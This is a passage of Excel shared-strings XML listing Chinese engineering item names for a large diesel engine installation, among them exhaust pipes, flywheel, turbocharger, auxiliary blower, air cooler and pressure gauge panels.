        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸排烟管</t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸排烟管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端板安装</t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>5</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>6</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸排烟管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管液压支撑管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器出口排烟管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>框架前端</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝热箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>贯穿螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>干洗布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗液容器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管旁通</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油发电机排气管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前后端平衡重布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的前端布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调频轮布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮和联轴节安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮液压拉伸器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮护罩</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>飞轮布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆分式齿轮缘安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分离装置布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全装置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机互锁布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑部件清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气启动器管系布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘车机安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气马达布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带链条的安全销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>死点指示器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气启动器隔离</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链轮安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>板式冷却器装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑泵支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板安装</t>
    </r>
  </si>
  <si>
    <r>
      <t>PI41</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>PI40-PI24</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表板壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重燃油压力表板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表板箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>报警指示器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器电加热</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>MS.66</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机和控制设备</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃气管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机订购清单</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停增压器阀安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器喷管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷管拉杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拉杆档杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转轴滚支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回转支架、</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器前端导轨</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器提升工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器前端提升附件</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器维修</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>停转工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器滚轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器拆卸工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器堵转工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却器行车轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机导管布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅托架支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端格栅支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排烟管座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端空冷器框架加工</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后端空冷器框架焊接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气侧上层平台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄箱走台支架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅布置更改</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台照明</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助风机布置在缸体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
